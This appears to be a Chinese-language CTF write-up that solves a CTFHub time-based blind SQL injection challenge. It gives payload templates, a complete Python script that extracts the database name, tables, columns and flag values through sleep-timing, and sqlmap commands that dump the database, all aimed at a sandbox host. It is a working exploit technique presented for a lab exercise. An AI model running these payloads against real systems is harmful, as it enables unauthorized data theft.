小白一个,如有错误请指正
这里使用两种解法
1.python脚本
2.sqlmap
一、需要用到的函数:
length() //返回字符串的长度
ascii() //返回一个字符的ascii码值
substr(字符串,开始位置,截取数量) //截取字符串
sleep() //时间注入的核心函数
if(判断语句,语句一,语句二) //条件为真返回语句一,否则返回语句二
二、语句
1.爆数据库长度
if(length(database())=数据库名长度,sleep(3),1)
2.爆数据库名
if(ascii(substr(database(),第i个字符,1))={ord(字符)},sleep(3),1)
3.爆表名
if(ascii(substr((select table_name from information_schema.tables where table_schema= '数据库名' limit 第i个表,1),第j个字符,1))={ord(字符)},sleep(3),1)
4.爆字段名
if(ascii(substr((select column_name from information_schema.columns where table_name = '表名' limit 第i个字段,1),第j个字符,1))={ord(字符)},sleep(3),1)
5.爆具体值
if(ascii(substr((select '字段名' from '表名' limit 第i行数据,1),第j个字符,1))={ord(字符)},sleep(2),0)
三、脚本如下
说明:下面这个脚本是爆出数据库所有的数据,本人比较菜,没能很好的优化(其实是懒),所以写出的这个脚本运行时间很长,大家可以拿到改一下,毕竟能爆出flag就可以了~
import requests
import time
def database_name():
    """Recover the current database name through the response-time oracle.

    Reads the module-level ``url`` (injection point) and ``dict_flag``
    (candidate alphabet), both assigned in the ``__main__`` block.

    Step 1 probes lengths 1..19 and takes the first request whose round trip
    is at least 2.5 s as the true length (the injected branch sleeps 3 s).
    Step 2 tests every alphabet character at every position 1..length the
    same way and appends each character whose request crossed the threshold.
    Only elapsed wall-clock time is inspected; the HTTP responses themselves
    are never read.

    Returns:
        str: the reconstructed name (empty if no length probe ever matched).
    """
    database_length = 0
    database_name = ''
    for i in range(1, 20):
        start = time.time()
        url_1 = url + f'1 and if(length(database())={i},sleep(3),1)'
        res_1 = requests.get(url_1)
        end = time.time()
        # Elapsed time is the only signal; the response body is ignored.
        if end - start >= 2.5:
            database_length = i
            break
    print('数据库长度为:', database_length)
    for k in range(1, database_length+1):
        for char in dict_flag:
            start = time.time()
            url_2 = url + f'1 and if(ascii(substr(database(),{k},1))={ord(char)},sleep(3),1)'
            # print(url_2)
            res_2 = requests.get(url_2)
            end = time.time()
            # No break after a match: the whole alphabet is tried per position.
            if end - start >= 2.5:
                database_name = database_name + char
    print('数据库名:' + database_name)
    return database_name
def tables_name(database_name):
    """Recover table names of ``database_name`` through the response-time oracle.

    Reads the module-level ``url`` and ``dict_flag``.  Only the first two
    tables (``limit 0,1`` and ``limit 1,1``) and positions 0..6 of each
    name are examined; a request taking more than 2.5 s (injected sleep is
    3 s) counts as a character match.

    Args:
        database_name: schema name to look up in information_schema.tables.

    Returns:
        list[str]: one (possibly empty) reconstructed name per table slot.
    """
    tables_name = []
    for table_number in range(0, 2):
        table_name = ''
        for k in range(0, 7):
            for char in dict_flag:
                start = time.time()
                url_3 = url + f'1 and if(ascii(substr((select table_name from information_schema.tables where table_schema= \'{database_name}\' limit {table_number},1),{k},1))={ord(char)},sleep(3),1)'
                # print(url_3)
                res_3 = requests.get(url_3)
                end = time.time()
                # Timing is the only signal; the response body is ignored.
                if end - start > 2.5:
                    table_name = table_name + char
        print('表名:', table_name)
        tables_name.append(table_name)
    # print(tables_name)
    return tables_name
def columns_name(tables_name):
    """Recover column names for each table through the response-time oracle.

    Reads the module-level ``url`` and ``dict_flag``.  For every table only
    the first two columns and positions 0..5 of each name are examined; a
    request taking more than 2.5 s (injected sleep is 3 s) counts as a
    character match.  Empty results are dropped.

    Args:
        tables_name: table names as returned by ``tables_name``.

    Returns:
        list[list[str]]: ``[table_name, column_name]`` pairs, non-empty names only.
    """
    columns_name = []
    for table_name in tables_name:
        for column_number in range(0, 2):
            column_name = ''
            for k in range(0, 6):
                for char in dict_flag:
                    start = time.time()
                    url_4 = url + f'1 and if(ascii(substr((select column_name from information_schema.columns where table_name = \'{table_name}\' limit {column_number},1),{k},1))={ord(char)},sleep(3),1)'
                    # print(url_4)
                    res_4 = requests.get(url_4)
                    end = time.time()
                    # Timing is the only signal; the response body is ignored.
                    if end - start > 2.5:
                        column_name = column_name + char
            # Keep only slots where at least one character matched.
            if column_name != '':
                print(f'{table_name}表列名:', column_name)
                columns_name.append([table_name, column_name])
    # print(columns_name)
    return columns_name
def flag_data(tables_columns):
    """Print the stored value of each (table, column) pair via the response-time oracle.

    Reads the module-level ``url`` and ``dict_flag``.  For each pair it walks
    up to 3 rows (``limit {k},1``) and up to 44 character positions per row.
    Here the injected sleep is 2 s and the threshold is 1.5 s, shorter than in
    the other functions.  Nothing is returned; results are only printed.

    Args:
        tables_columns: ``[table_name, column_name]`` pairs as returned by
            ``columns_name`` (index 0 is the table, index 1 the column).
    """
    for table_column in tables_columns:
        for k in range(0, 3):
            flag = ''
            for flag_number in range(1, 45):
                mark = 0  # stays 0 while no character matched at this position
                for char in dict_flag:
                    start = time.time()
                    url_5 = url + f'1 and if(ascii(substr((select {table_column[1]} from {table_column[0]} limit {k},1),{flag_number},1))={ord(char)},sleep(2),0)'
                    # print(url_5)
                    res_5 = requests.get(url_5)
                    end = time.time()
                    # Timing is the only signal; the response body is ignored.
                    if end - start > 1.5:
                        flag = flag + char
                        mark = 1
                # No match at this position: treat the value as fully read.
                if flag == '' or mark == 0:
                    break
            # An empty row ends the walk over rows for this column.
            if flag == '':
                break
            print(f'{table_column[0]}->{table_column[1]}:' + flag)
if __name__ == '__main__':
    start_time =time.time()
    # Module-level settings read directly by the functions above: the
    # injection point (query parameter ``id``) and the candidate alphabet.
    url = 'http://challenge-28732b148c98f2d4.sandbox.ctfhub.com:10800/?id='
    dict_flag = 'qwertyuiopasdfghjklzxcvbnm{}1234567890'
    # NOTE: each assignment rebinds the function's own name to its result,
    # so ``database_name`` / ``tables_name`` cannot be called a second time.
    database_name = database_name()
    tables_name = tables_name(database_name)
    tables_columns = columns_name(tables_name)
    flag_data(tables_columns)
    end_time = time.time()
    # Total wall-clock time of the run, in seconds.
    print(end_time - start_time)
效果如下:
四、使用sqlmap
1.按步骤来就可以了
sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 --dbs
sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 -D sqli --tables
sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 -D sqli -T flag --columns
sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 -D sqli -T flag -C flag --dump